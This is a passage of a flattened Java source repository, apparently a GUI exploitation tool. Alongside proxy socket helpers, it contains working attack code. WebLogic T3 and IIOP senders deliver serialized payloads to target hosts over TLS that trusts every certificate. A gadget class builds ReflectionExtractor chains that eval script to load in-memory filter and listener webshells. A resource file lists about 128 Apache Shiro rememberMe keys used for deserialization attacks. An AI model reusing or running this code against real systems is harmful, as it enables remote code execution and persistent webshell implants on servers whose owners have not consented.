java.net.Socket; 9 | 10 | 11 | public class ProxySSLSocketFactory extends SSLSocketFactory 12 | { 13 | private ProxyConfig proxyConfig; 14 | private SSLSocketFactory socketFactory; 15 | 16 | public ProxySSLSocketFactory(ProxyConfig proxyConfig, SSLSocketFactory socketFactory) 17 | { 18 | this.proxyConfig = proxyConfig; 19 | this.socketFactory = socketFactory; 20 | } 21 | 22 | @Override 23 | public String[] getDefaultCipherSuites() 24 | { 25 | return socketFactory.getDefaultCipherSuites(); 26 | } 27 | 28 | @Override 29 | public String[] getSupportedCipherSuites() 30 | { 31 | return socketFactory.getSupportedCipherSuites(); 32 | } 33 | 34 | @Override 35 | public Socket createSocket() throws IOException 36 | { 37 | Proxy proxy = proxyConfig.getProxy(); 38 | if (proxy != null) 39 | { 40 | return new Socket(proxy); 41 | } 42 | else 43 | { 44 | return new Socket(); 45 | } 46 | } 47 | 48 | @Override 49 | public Socket createSocket(String host, int port) throws IOException 50 | { 51 | Socket socket = createSocket(); 52 | try 53 | { 54 | return socketFactory.createSocket(socket, host, port, true); 55 | } 56 | catch (IOException e) 57 | { 58 | socket.close(); 59 | throw e; 60 | } 61 | } 62 | 63 | @Override 64 | public Socket createSocket(Socket s, String host, int port, boolean autoClose) throws IOException 65 | { 66 | // ��Ϊ�������һ���Ѿ����õ�socket�������޷����� 67 | return socketFactory.createSocket(s, host, port, autoClose); 68 | } 69 | 70 | @Override 71 | public Socket createSocket(InetAddress address, int port) throws IOException 72 | { 73 | Socket socket = createSocket(); 74 | try 75 | { 76 | return socketFactory.createSocket(socket, address.getHostAddress(), port, true); 77 | } 78 | catch (IOException e) 79 | { 80 | socket.close(); 81 | throw e; 82 | } 83 | } 84 | 85 | @Override 86 | public Socket createSocket(String host, int port, InetAddress clientAddress, int clientPort) throws IOException 87 | { 88 | Socket socket = createSocket(); 89 | try 90 | { 91 | socket.bind(new InetSocketAddress(clientAddress, clientPort)); 92 | return socketFactory.createSocket(socket, host, port, true); 93 | } 94 | catch (IOException e) 95 | { 96 | socket.close(); 97 | throw e; 98 | } 99 | } 100 | 101 | @Override 102 | public Socket createSocket(InetAddress address, int port, InetAddress clientAddress, int clientPort) throws IOException 103 | { 104 | Socket socket = createSocket(); 105 | try 106 | { 107 | socket.bind(new InetSocketAddress(clientAddress, clientPort)); 108 | return socketFactory.createSocket(socket, address.getHostAddress(), port, true); 109 | } 110 | catch (IOException e) 111 | { 112 | socket.close(); 113 | throw e; 114 | } 115 | } 116 | } -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/ProxySocketFactory.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import javax.net.SocketFactory; 4 | import java.io.IOException; 5 | import java.net.*; 6 | 7 | 8 | public class ProxySocketFactory extends SocketFactory 9 | { 10 | private ProxyConfig proxyConfig; 11 | 12 | public ProxySocketFactory(ProxyConfig proxyConfig) 13 | { 14 | this.proxyConfig = proxyConfig; 15 | } 16 | 17 | @Override 18 | public Socket createSocket() throws IOException 19 | { 20 | Proxy proxy = proxyConfig.getProxy(); 21 | if (proxy != null) 22 | { 23 | return new Socket(proxy); 24 | } 25 | else 26 | { 27 | return new Socket(); 28 | } 29 | } 30 | 31 | @Override 32 | public Socket createSocket(String host, int port) throws IOException, UnknownHostException 33 | { 34 | Socket socket = createSocket(); 35 | try 36 | { 37 | socket.connect(new InetSocketAddress(host, port)); 38 | } 39 | catch (IOException e) 40 | { 41 | socket.close(); 42 | throw e; 43 | } 44 | return socket; 45 | } 46 | 47 | @Override 48 | public Socket createSocket(InetAddress address, int port) throws IOException 49 | { 50 | Socket socket = createSocket(); 51 | try 52 | { 53 | socket.connect(new InetSocketAddress(address, port)); 54 | } 55 | catch (IOException e) 56 | { 57 | socket.close(); 58 | throw e; 59 | } 60 | return socket; 61 | } 62 | 63 | @Override 64 | public Socket createSocket(String host, int port, InetAddress clientAddress, int clientPort) 65 | throws IOException, UnknownHostException 66 | { 67 | Socket socket = createSocket(); 68 | try 69 | { 70 | socket.bind(new InetSocketAddress(clientAddress, clientPort)); 71 | socket.connect(new InetSocketAddress(host, port)); 72 | } 73 | catch (IOException e) 74 | { 75 | socket.close(); 76 | throw e; 77 | } 78 | return socket; 79 | } 80 | 81 | @Override 82 | public Socket createSocket(InetAddress address, int port, InetAddress clientAddress, int clientPort) throws IOException 83 | { 84 | Socket socket = createSocket(); 85 | try 86 | { 87 | socket.bind(new InetSocketAddress(clientAddress, clientPort)); 88 | socket.connect(new InetSocketAddress(address, port)); 89 | } 90 | catch (IOException e) 91 | { 92 | socket.close(); 93 | throw e; 94 | } 95 | return socket; 96 | } 97 | 98 | 99 | 100 | } 101 | -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/ThreadLocalProxyAuthenticator.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import java.net.Authenticator; 4 | import java.net.PasswordAuthentication; 5 | 6 | 7 | public class ThreadLocalProxyAuthenticator extends Authenticator 8 | { 9 | private ThreadLocal credentials = null; 10 | private static class SingletonHolder 11 | { 12 | private static final ThreadLocalProxyAuthenticator instance = new ThreadLocalProxyAuthenticator(); 13 | } 14 | 15 | public static final ThreadLocalProxyAuthenticator getInstance() 16 | { 17 | return SingletonHolder.instance; 18 | } 19 | 20 | public void setCredentials(PasswordAuthentication passAuth) 21 | { 22 | credentials.set(passAuth); 23 | } 24 | 25 | public static void clearCredentials() 26 | { 27 | ThreadLocalProxyAuthenticator authenticator = ThreadLocalProxyAuthenticator.getInstance(); 28 | Authenticator.setDefault(authenticator); 29 | authenticator.credentials.set(null); 30 | } 31 | 32 | @Override 33 | public PasswordAuthentication getPasswordAuthentication() 34 | { 35 | return credentials.get(); 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/utils/okhttplib/TyrRequestBody.java: -------------------------------------------------------------------------------- 1 | package utils.okhttplib; 2 | 3 | import okhttp3.internal.Util; 4 | import okhttp3.MediaType; 5 | import okhttp3.RequestBody; 6 | import okio.BufferedSink; 7 | import okio.BufferedSource; 8 | import okio.Okio; 9 | 10 | import java.io.File; 11 | import java.io.IOException; 12 | import java.nio.charset.Charset; 13 | import java.util.Arrays; 14 | 15 | 16 | public class TyrRequestBody { 17 | 18 | public static RequestBody create(MediaType contentType, String content, int chunkCount) throws Exception { 19 | Charset charset = Util.UTF_8; 20 | if (contentType != null) { 21 | charset = contentType.charset(); 22 | if (charset == null) { 23 | charset = Util.UTF_8; 24 | contentType = MediaType.parse(contentType + "; charset=utf-8"); 25 | } 26 | } 27 | 28 | byte[] bytes = content.getBytes(charset); 29 | return create(contentType, bytes, chunkCount); 30 | } 31 | 32 | public static RequestBody create(final MediaType contentType, final byte[] content, final int chunkCount) { 33 | if (chunkCount < 0) { 34 | return RequestBody.create(contentType, content, 0, content.length); 35 | } 36 | else { 37 | return new RequestBody() { 38 | @Override 39 | public MediaType contentType() { 40 | return contentType; 41 | } 42 | 43 | @Override 44 | public void writeTo(BufferedSink sink) throws IOException { 45 | int startIndex = 0; 46 | int endIndex = chunkCount; 47 | while (content.length > endIndex) 48 | { 49 | byte[] chunkedData = Arrays.copyOfRange(content, startIndex, endIndex); 50 | sink.write(chunkedData, 0, chunkedData.length); 51 | sink.flush(); 52 | startIndex = endIndex; 53 | endIndex += chunkCount; 54 | } 55 | byte[] chunkedData = Arrays.copyOfRange(content, startIndex, content.length); 56 | sink.write(chunkedData, 0, chunkedData.length); 57 | sink.flush(); 58 | } 59 | }; 60 | } 61 | } 62 | 63 | public static RequestBody create(final MediaType contentType, final File file, final int chunkCount) { 64 | if (chunkCount < 0) { 65 | return RequestBody.create(contentType, file); 66 | } 67 | else { 68 | return new RequestBody() { 69 | @Override 70 | public MediaType contentType() { return contentType; } 71 | 72 | @Override 73 | public void writeTo(BufferedSink sink) throws IOException { 74 | BufferedSource source = null; 75 | try { 76 | source = Okio.buffer(Okio.source(file)); 77 | int endIndex = chunkCount; 78 | while (file.length() > endIndex) { 79 | byte[] data = source.readByteArray(chunkCount); 80 | sink.write(data, 0, data.length); 81 | sink.flush(); 82 | endIndex += chunkCount; 83 | } 84 | long lastCount = (long)chunkCount - ((long)endIndex - file.length()); 85 | byte[] data = source.readByteArray(lastCount); 86 | sink.write(data, 0, data.length); 87 | sink.flush(); 88 | } 89 | finally { 90 | Util.closeQuietly(source); 91 | } 92 | } 93 | }; 94 | } 95 | } 96 | } 97 | 98 | -------------------------------------------------------------------------------- /src/main/java/utils/weblogic/IIOPProtocolOperation.java: -------------------------------------------------------------------------------- 1 | package utils.weblogic; 2 | 3 | 4 | import javax.naming.Context; 5 | import javax.naming.InitialContext; 6 | import javax.naming.NamingException; 7 | import java.util.Hashtable; 8 | 9 | public class IIOPProtocolOperation { 10 | public static void send(String ip, String port, Object payload) throws NamingException { 11 | String rhost = String.format("iiop://%s:%s", ip, port); 12 | 13 | Hashtable env = new Hashtable(); 14 | env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory"); 15 | env.put("java.naming.provider.url", rhost); 16 | Context context = new InitialContext(env); 17 | 18 | context.rebind("test" + System.nanoTime(), payload); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /src/main/java/utils/weblogic/T3ProtocolOperation.java: -------------------------------------------------------------------------------- 1 | package utils.weblogic; 2 | 3 | 4 | import javax.net.ssl.SSLContext; 5 | import javax.net.ssl.SSLSocketFactory; 6 | import javax.net.ssl.TrustManager; 7 | import javax.net.ssl.X509TrustManager; 8 | import java.io.*; 9 | import java.net.Socket; 10 | import java.security.SecureRandom; 11 | import java.security.cert.CertificateException; 12 | import java.security.cert.X509Certificate; 13 | 14 | public class T3ProtocolOperation { 15 | 16 | public static String bytesToHexString(byte[] src) { 17 | StringBuilder stringBuilder = new StringBuilder(""); 18 | if (src == null || src.length <= 0) { 19 | return null; 20 | } 21 | for (int i = 0; i < src.length; i++) { 22 | int v = src[i] & 0xFF; 23 | String hv = Integer.toHexString(v); 24 | if (hv.length() < 2) { 25 | stringBuilder.append(0); 26 | } 27 | stringBuilder.append(hv); 28 | } 29 | return stringBuilder.toString(); 30 | } 31 | 32 | public static byte[] hexStringToBytes(String hexString) { 33 | if (hexString != null && !hexString.equals("")) { 34 | hexString = hexString.toUpperCase(); 35 | int length = hexString.length() / 2; 36 | char[] hexChars = hexString.toCharArray(); 37 | byte[] d = new byte[length]; 38 | 39 | for (int i = 0; i < length; ++i) { 40 | int pos = i * 2; 41 | d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1])); 42 | } 43 | 44 | return d; 45 | } else { 46 | return null; 47 | } 48 | } 49 | 50 | private static byte charToByte(char c) { 51 | return (byte) "0123456789ABCDEF".indexOf(c); 52 | } 53 | 54 | public static byte[] serialize(Object ref) throws IOException { 55 | ByteArrayOutputStream out = new ByteArrayOutputStream(); 56 | ObjectOutputStream objOut = new ObjectOutputStream(out); 57 | objOut.writeObject(ref); 58 | return out.toByteArray(); 59 | } 60 | 61 | public static void send(String protocol, String host, String port, byte[] payload) throws Exception { 62 | Socket socket = null; 63 | if (protocol.equalsIgnoreCase("t3s")){ 64 | SSLContext context = SSLContext.getInstance("SSL"); 65 | context.init(null, new TrustManager[] {(TrustManager) new TrustManagerImpl()}, new SecureRandom()); 66 | SSLSocketFactory factory = context.getSocketFactory(); 67 | socket = factory.createSocket(host, Integer.parseInt(port)); 68 | } 69 | else{socket = new Socket(host, Integer.parseInt(port));} 70 | //AS ABBREV_TABLE_SIZE HL remoteHeaderLength 用来做skip的 71 | String header = "t3 7.0.0.0\nAS:10\nHL:19\n\n"; 72 | socket.getOutputStream().write(header.getBytes()); 73 | socket.getOutputStream().flush(); 74 | BufferedReader br = new BufferedReader(new InputStreamReader(socket.getInputStream())); 75 | String versionInfo = br.readLine(); 76 | versionInfo = versionInfo.replace("HELO:", ""); 77 | versionInfo = versionInfo.replace(".false", ""); 78 | System.out.println("WeblogicVersion: " + versionInfo); 79 | 80 | String data1 = "016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000"; 81 | String data2 = bytesToHexString(payload); 82 | String data = data1 + data2; 83 | data = String.format("%08x", (data.length() / 2 + 4)) + data; 84 | socket.getOutputStream().write(hexStringToBytes(data)); 85 | socket.getOutputStream().write(hexStringToBytes(data)); 86 | 87 | } 88 | static class TrustManagerImpl implements X509TrustManager { 89 | public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {} 90 | 91 | public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {} 92 | 93 | public X509Certificate[] getAcceptedIssuers() { 94 | return null; 95 | } 96 | } 97 | 98 | } 99 | -------------------------------------------------------------------------------- /src/main/java/utils/weblogic/WeblogicGadget.java: -------------------------------------------------------------------------------- 1 | package utils.weblogic; 2 | 3 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; 4 | import com.tangosol.util.extractor.ReflectionExtractor; 5 | import core.enumtypes.PayloadType; 6 | import core.memshell.WeblogicFilterMemShell; 7 | import core.memshell.WeblogicListenerMemShell; 8 | 9 | import javassist.CtClass; 10 | import utils.Util; 11 | 12 | public class WeblogicGadget { 13 | 14 | public static ReflectionExtractor[] getReflectionExtractor(PayloadType type, String trojanType) throws Exception { 15 | byte[] bytecodes = null; 16 | CtClass clazz = null; 17 | switch (type){ 18 | case weblogiclistenermemshell: 19 | clazz = Util.addSuperClass(WeblogicListenerMemShell.class, AbstractTranslet.class.getName()); 20 | break; 21 | case weblogicfiltermemshell: 22 | clazz = Util.addSuperClass(WeblogicFilterMemShell.class, AbstractTranslet.class.getName()); 23 | break; 24 | } 25 | clazz.replaceClassName(clazz.getName(), clazz.getName() +System.nanoTime()); 26 | bytecodes = clazz.toBytecode(); 27 | clazz.defrost(); 28 | String code = "var hex = '" + Util.bytesToHexString(bytecodes) + "';\n" + 29 | "hex = hex.length() % 2 != 0 ? \"0\" + hex : hex;\n" + 30 | "var b = new java.io.ByteArrayOutputStream();\n" + 31 | "for (var i = 0; i < hex.length() / 2; i++) {\n" + 32 | " var index = i * 2;\n" + 33 | " var v = java.lang.Integer.parseInt(hex.substring(index, index + 2), 16);\n" + 34 | " b.write(v);\n" + 35 | "};\n" + 36 | "b.close(); \n" + 37 | "var bytes = b.toByteArray(); \n" + 38 | "var classLoader = java.lang.Thread.currentThread().getContextClassLoader();\n" + 39 | "var method = java.lang.ClassLoader.class.getDeclaredMethod('defineClass', ''.getBytes().getClass(), java.lang.Integer.TYPE, java.lang.Integer.TYPE);\n" + 40 | "method.setAccessible(true);\n" + 41 | "var clazz = method.invoke(classLoader, bytes, 0, bytes.length);\n" + 42 | "clazz.newInstance();\n"; 43 | 44 | ReflectionExtractor extractor1 = new ReflectionExtractor( 45 | "getConstructor", 46 | new Object[]{new Class[0]} 47 | ); 48 | 49 | ReflectionExtractor extractor2 = new ReflectionExtractor( 50 | "newInstance", 51 | new Object[]{new Object[0]} 52 | ); 53 | 54 | ReflectionExtractor extractor3 = new ReflectionExtractor( 55 | "getEngineByName", 56 | new Object[]{"javascript"} 57 | ); 58 | 59 | ReflectionExtractor extractor4 = new ReflectionExtractor( 60 | "eval", 61 | new Object[]{code} 62 | ); 63 | 64 | ReflectionExtractor[] extractors = { 65 | extractor1, 66 | extractor2, 67 | extractor3, 68 | extractor4 69 | }; 70 | return extractors; 71 | } 72 | } 73 | -------------------------------------------------------------------------------- /src/main/resources/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: ui.Main 3 | 4 | -------------------------------------------------------------------------------- /src/main/resources/data/shiro_keys.txt: -------------------------------------------------------------------------------- 1 | 2AvVhdsgUs0FSA3SDFAdag== 2 | kPH+bIxk5D2deZiIxcaaaA== 3 | 3AvVhmFLUs0KTA3Kprsdag== 4 | 4AvVhmFLUs0KTA3Kprsdag== 5 | 5aaC5qKm5oqA5pyvAAAAAA== 6 | 6ZmI6I2j5Y+R5aSn5ZOlAA== 7 | bWljcm9zAAAAAAAAAAAAAA== 8 | wGiHplamyXlVB11UXWol8g== 9 | Z3VucwAAAAAAAAAAAAAAAA== 10 | MTIzNDU2Nzg5MGFiY2RlZg== 11 | zSyK5Kp6PZAAjlT+eeNMlg== 12 | U3ByaW5nQmxhZGUAAAAAAA== 13 | 5AvVhmFLUs0KTA3Kprsdag== 14 | bXdrXl9eNjY2KjA3Z2otPQ== 15 | fCq+/xW488hMTCD+cmJ3aQ== 16 | 1QWLxg+NYmxraMoxAXu/Iw== 17 | ZUdsaGJuSmxibVI2ZHc9PQ== 18 | L7RioUULEFhRyxM7a2R/Yg== 19 | r0e3c16IdVkouZgk1TKVMg== 20 | bWluZS1hc3NldC1rZXk6QQ== 21 | a2VlcE9uR29pbmdBbmRGaQ== 22 | WcfHGU25gNnTxTlmJMeSpw== 23 | ZAvph3dsQs0FSL3SDFAdag== 24 | tiVV6g3uZBGfgshesAQbjA== 25 | cmVtZW1iZXJNZQAAAAAAAA== 26 | ZnJlc2h6Y24xMjM0NTY3OA== 27 | RVZBTk5JR0hUTFlfV0FPVQ== 28 | WkhBTkdYSUFPSEVJX0NBVA== 29 | GsHaWo4m1eNbE0kNSMULhg== 30 | l8cc6d2xpkT1yFtLIcLHCg== 31 | KU471rVNQ6k7PQL4SqxgJg== 32 | 0AvVhmFLUs0KTA3Kprsdag== 33 | 1AvVhdsgUs0FSA3SDFAdag== 34 | 25BsmdYwjnfcWmnhAciDDg== 35 | 3JvYhmBLUs0ETA5Kprsdag== 36 | 6AvVhmFLUs0KTA3Kprsdag== 37 | 6NfXkC7YVCV5DASIrEm1Rg== 38 | 7AvVhmFLUs0KTA3Kprsdag== 39 | 8AvVhmFLUs0KTA3Kprsdag== 40 | 8BvVhmFLUs0KTA3Kprsdag== 41 | 9AvVhmFLUs0KTA3Kprsdag== 42 | OUHYQzxQ/W9e/UjiAGu6rg== 43 | a3dvbmcAAAAAAAAAAAAAAA== 44 | aU1pcmFjbGVpTWlyYWNsZQ== 45 | bXRvbnMAAAAAAAAAAAAAAA== 46 | OY//C4rhfwNxCQAQCrQQ1Q== 47 | 5J7bIJIV0LQSN3c9LPitBQ== 48 | f/SY5TIve5WWzT4aQlABJA== 49 | bya2HkYo57u6fWh5theAWw== 50 | WuB+y2gcHRnY2Lg9+Aqmqg== 51 | 3qDVdLawoIr1xFd6ietnwg== 52 | YI1+nBV//m7ELrIyDHm6DQ== 53 | 6Zm+6I2j5Y+R5aS+5ZOlAA== 54 | 2A2V+RFLUs+eTA3Kpr+dag== 55 | 6ZmI6I2j3Y+R1aSn5BOlAA== 56 | SkZpbmFsQmxhZGUAAAAAAA== 57 | 2cVtiE83c4lIrELJwKGJUw== 58 | fsHspZw/92PrS3XrPW+vxw== 59 | XTx6CKLo/SdSgub+OPHSrw== 60 | sHdIjUN6tzhl8xZMG3ULCQ== 61 | O4pdf+7e+mZe8NyxMTPJmQ== 62 | HWrBltGvEZc14h9VpMvZWw== 63 | rPNqM6uKFCyaL10AK51UkQ== 64 | Y1JxNSPXVwMkyvES/kJGeQ== 65 | lT2UvDUmQwewm6mMoiw4Ig== 66 | MPdCMZ9urzEA50JDlDYYDg== 67 | xVmmoltfpb8tTceuT5R7Bw== 68 | c+3hFGPjbgzGdrC+MHgoRQ== 69 | ClLk69oNcA3m+s0jIMIkpg== 70 | Bf7MfkNR0axGGptozrebag== 71 | 1tC/xrDYs8ey+sa3emtiYw== 72 | ZmFsYWRvLnh5ei5zaGlybw== 73 | cGhyYWNrY3RmREUhfiMkZA== 74 | IduElDUpDDXE677ZkhhKnQ== 75 | yeAAo1E8BOeAYfBlm4NG9Q== 76 | cGljYXMAAAAAAAAAAAAAAA== 77 | 2itfW92XazYRi5ltW0M2yA== 78 | XgGkgqGqYrix9lI6vxcrRw== 79 | ertVhmFLUs0KTA3Kprsdag== 80 | 5AvVhmFLUS0ATA4Kprsdag== 81 | s0KTA3mFLUprK4AvVhsdag== 82 | hBlzKg78ajaZuTE0VLzDDg== 83 | 9FvVhtFLUs0KnA3Kprsdyg== 84 | d2ViUmVtZW1iZXJNZUtleQ== 85 | yNeUgSzL/CfiWw1GALg6Ag== 86 | NGk/3cQ6F5/UNPRh8LpMIg== 87 | 4BvVhmFLUs0KTA3Kprsdag== 88 | MzVeSkYyWTI2OFVLZjRzZg== 89 | empodDEyMwAAAAAAAAAAAA== 90 | A7UzJgh1+EWj5oBFi+mSgw== 91 | c2hpcm9fYmF0aXMzMgAAAA== 92 | i45FVt72K2kLgvFrJtoZRw== 93 | U3BAbW5nQmxhZGUAAAAAAA== 94 | Jt3C93kMR9D5e8QzwfsiMw== 95 | MTIzNDU2NzgxMjM0NTY3OA== 96 | vXP33AonIp9bFwGl7aT7rA== 97 | V2hhdCBUaGUgSGVsbAAAAA== 98 | Q01TX0JGTFlLRVlfMjAxOQ== 99 | Is9zJ3pzNh2cgTHB4ua3+Q== 100 | NsZXjXVklWPZwOfkvk6kUA== 101 | GAevYnznvgNCURavBhCr1w== 102 | 66v1O8keKNV3TTcGPK1wzg== 103 | SDKOLKn2J1j/2BHjeZwAoQ== 104 | kPH+bIxk5D2deZiIxcabaA== 105 | kPH+bIxk5D2deZiIxcacaA== 106 | 3AvVhdAgUs0FSA4SDFAdBg== 107 | 4AvVhdsgUs0F563SDFAdag== 108 | FL9HL9Yu5bVUJ0PDU1ySvg== 109 | 5RC7uBZLkByfFfJm22q/Zw== 110 | eXNmAAAAAAAAAAAAAAAAAA== 111 | fdCEiK9YvLC668sS43CJ6A== 112 | FJoQCiz0z5XWz2N2LyxNww== 113 | HeUZ/LvgkO7nsa18ZyVxWQ== 114 | HoTP07fJPKIRLOWoVXmv+Q== 115 | iycgIIyCatQofd0XXxbzEg== 116 | m0/5ZZ9L4jjQXn7MREr/bw== 117 | NoIw91X9GSiCrLCF03ZGZw== 118 | oPH+bIxk5E2enZiIxcqaaA== 119 | QAk0rp8sG0uJC4Ke2baYNA== 120 | Rb5RN+LofDWJlzWAwsXzxg== 121 | s2SE9y32PvLeYo+VGFpcKA== 122 | SrpFBcVD89eTQ2icOD0TMg== 123 | U0hGX2d1bnMAAAAAAAAAAA== 124 | Us0KvVhTeasAm43KFLAeng== 125 | Ymx1ZXdoYWxlAAAAAAAAAA== 126 | YWJjZGRjYmFhYmNkZGNiYQ== 127 | zIiHplamyXlVB11UXWol8g== 128 | ZjQyMTJiNTJhZGZmYjFjMQ== 129 | -------------------------------------------------------------------------------- /src/main/resources/rmi.fxml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 |